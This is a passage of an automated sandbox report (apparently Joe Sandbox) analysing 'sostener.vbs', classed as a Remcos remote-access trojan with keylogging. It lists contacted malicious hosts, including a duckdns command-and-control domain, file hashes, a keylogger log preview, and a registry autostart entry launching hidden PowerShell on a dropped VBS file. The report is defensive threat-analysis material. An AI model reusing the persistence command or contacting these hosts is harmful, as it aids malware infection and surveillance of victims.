00000025.00000002.3037888768.00000155ACC90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E97D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E00049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E0005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282868000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1814218663.0000029B1A491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.00000168936A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.000002905F3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3A861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2087405410.000001EA3F0B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81BB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACD3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E9A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E00088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282932000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.vpowershell.exe, 00000005.00000002.1948374011.0000020FEC19B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://oneget.orgpowershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  15.235.85.194
                                  		informacionoportuna.comUnited States
                                  		71HP-INTERNET-ASUStrue
                                  173.208.241.155
                                  		comandoespecial2023.duckdns.orgUnited States
                                  		32097WIIUStrue
                                  178.237.33.50
                                  		geoplugin.netNetherlands
                                  		8455ATOM86-ASATOM86NLfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1519307
                                  Start date and time:2024-09-26 10:54:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 14s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:43
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:sostener.vbs
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.expl.evad.winVBS@70/58@4/3
                                  EGA Information:
                                  • Successful, ratio: 42.9%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 28
                                  • Number of non-executed functions: 208
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target RegSvcs.exe, PID 2124 because there are no executed function
                                  • Execution Graph export aborted for target powershell.exe, PID 3272 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 5432 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 8032 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: sostener.vbs

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  04:55:07API Interceptor232x Sleep call for process: powershell.exe modified
                                  04:55:44API Interceptor1712794x Sleep call for process: RegSvcs.exe modified
                                  09:55:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                  09:55:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  178.237.33.50SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • geoplugin.net/json.gp
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  file.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • geoplugin.net/json.gp
                                  BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • geoplugin.net/json.gp
                                  z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  • geoplugin.net/json.gp
                                  Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • geoplugin.net/json.gp

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  geoplugin.netSecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  file.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  • 178.237.33.50

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WIIUShttp://brigittenoel.com/wp-admin/js/alt/TS/wallet.htmlGet hashmaliciousUnknownBrowse
                                  • 173.208.194.98
                                  https://chattts-49f1.beszyrecala.workers.dev/f9f981ac-a3fc-46ec-96fe-22=Get hashmaliciousUnknownBrowse
                                  • 173.208.137.67
                                  https://segurancanosdados.com/principal.htmlGet hashmaliciousUnknownBrowse
                                  • 173.208.138.219
                                  http://pub-0bf7cd9e2c85443595cf1e36e3935ce0.r2.dev/woae.htmlGet hashmaliciousUnknownBrowse
                                  • 173.208.194.98
                                  https://pub-be64ef602be34b23842115eb08227fd2.r2.dev/ededu.htmlGet hashmaliciousUnknownBrowse
                                  • 173.208.194.98
                                  https://cepmmvirtual.edu.pe/ch/Get hashmaliciousUnknownBrowse
                                  • 173.208.144.138
                                  ExeFile (145).exeGet hashmaliciousEmotetBrowse
                                  • 69.30.203.214
                                  ExeFile (156).exeGet hashmaliciousEmotetBrowse
                                  • 69.30.203.214
                                  https://kyo.mjj.mybluehost.me/Metamask-Draga/MT/Get hashmaliciousUnknownBrowse
                                  • 173.208.194.98
                                  https://pub-2b9b096c777f479495c3e42da3b8a2e0.r2.dev/ledge.htmlGet hashmaliciousUnknownBrowse
                                  • 173.208.194.98
                                  HP-INTERNET-ASUShttp://WWW.LUTHERANSONLINE.COM/SHALOMICGet hashmaliciousUnknownBrowse
                                  • 15.235.211.177
                                  rsJtZBgpwG.elfGet hashmaliciousMiraiBrowse
                                  • 15.178.34.35
                                  https://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.htmlGet hashmaliciousHTMLPhisherBrowse
                                  • 15.156.174.66
                                  Facturas de pago 003839,72011,030184.bat.exeGet hashmaliciousAgentTeslaBrowse
                                  • 15.235.118.15
                                  https://credit.fb-business.com/Get hashmaliciousUnknownBrowse
                                  • 15.235.209.42
                                  http://t.yesware.com/tt/0ffd1f55c7e6a0ced56d29538e63fa334cce8cd2/340be3fbd5588b7ae8659d398f6ebdbe/6b6b3691935bcccf7dc7e5bf662a5dca/www.techcare.cl/pt/?conceicao.martins@cellnextelecom.ptGet hashmaliciousUnknownBrowse
                                  • 15.235.4.255
                                  Lista de embalaje y direcci#U00f3n de DHL.bat.exeGet hashmaliciousAgentTeslaBrowse
                                  • 15.235.118.15
                                  D0F48A0632B6C451791F4257697E861961F06A6F.htmlGet hashmaliciousUnknownBrowse
                                  • 15.204.241.81
                                  firmware.i686.elfGet hashmaliciousUnknownBrowse
                                  • 15.157.89.240
                                  firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                  • 15.157.89.240
                                  ATOM86-ASATOM86NLSecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  file.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  • 178.237.33.50

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 15.235.85.194
                                  CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 15.235.85.194
                                  RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 15.235.85.194
                                  RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                  • 15.235.85.194
                                  QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 15.235.85.194
                                  450230549.exeGet hashmaliciousAgentTeslaBrowse
                                  • 15.235.85.194
                                  450230549.exeGet hashmaliciousUnknownBrowse
                                  • 15.235.85.194
                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                  • 15.235.85.194
                                  https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                                  • 15.235.85.194
                                  http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                  • 15.235.85.194

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\remcos\logs.dat

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):552
                                  Entropy (8bit):3.4647429182669884
                                  Encrypted:false
                                  SSDEEP:12:6l+ec0WFe5BWFe5Tw0kqW1+fCsv9w0kFW+:6Nc0WqBWqUdqW1+fCBdFW+
                                  MD5:23EBF676CC03711678B10D0946CA71B1
                                  SHA1:DBB46EF74D68154712AF970A929E74D9A606300B
                                  SHA-256:614046A256E0F286DD6E8F141DB95B61A10678C23DA11713A263A3749935E22C
                                  SHA-512:36FFC2BDFDCEAA0DC672BEBB76061778FE67439D8A1DC3005433FF8E9E676D0966BF32FB8AE114530EC0562ABDE5FCA15FF2A87EBDABC61507B42893A8F19321
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                  Preview:....[.2.0.2.4./.0.9./.2.6. .0.4.:.5.5.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.P.o.w.e.r.S.h.e.l.l...e.x.e.].........[.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):962
                                  Entropy (8bit):5.013811273052389
                                  Encrypted:false
                                  SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                  MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                  SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                  SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                  SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                  Malicious:false
                                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):28398
                                  Entropy (8bit):5.063590717663346
                                  Encrypted:false
                                  SSDEEP:768:TLbV3IpNBQkj2Uh4iUxkOZhxCardFvJOOdB8tAHkLNZzNKe1MlYo7YPU:TLbV3CNBQkj2Uh4iUxkOgqdJJOOdB8tu
                                  MD5:E489B959E14B529323FF0CFBF6CB9E56
                                  SHA1:B6150F38208711CD985C3434E62B37D1A71845B5
                                  SHA-256:AA30F61810AEE09A2FC4AEC7662809B7ADC47287FAF312DCFD0CF983B80AAE0E
                                  SHA-512:CE9985AFD0EB08BA7B4755735BCD609089040D8D59948C0776072C4A90B13C46FB8847A673E86A75777A0BEECF7C4E0EBAE53561AD8186F7A481EF57B48A39B6
                                  Malicious:false
                                  Preview:PSMODULECACHE.-...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tidacm4.zpe.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15mipq2n.gkf.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jh1qeit.h2y.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1owxtdep.dvi.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xfjnky4.y2i.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fkrqk5e.gr4.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m3qld52.azy.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4y5wi1go.v5n.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5azf1hna.s1i.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lscxdeq.sec.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alyyas5a.uto.ps1

                                  Download File
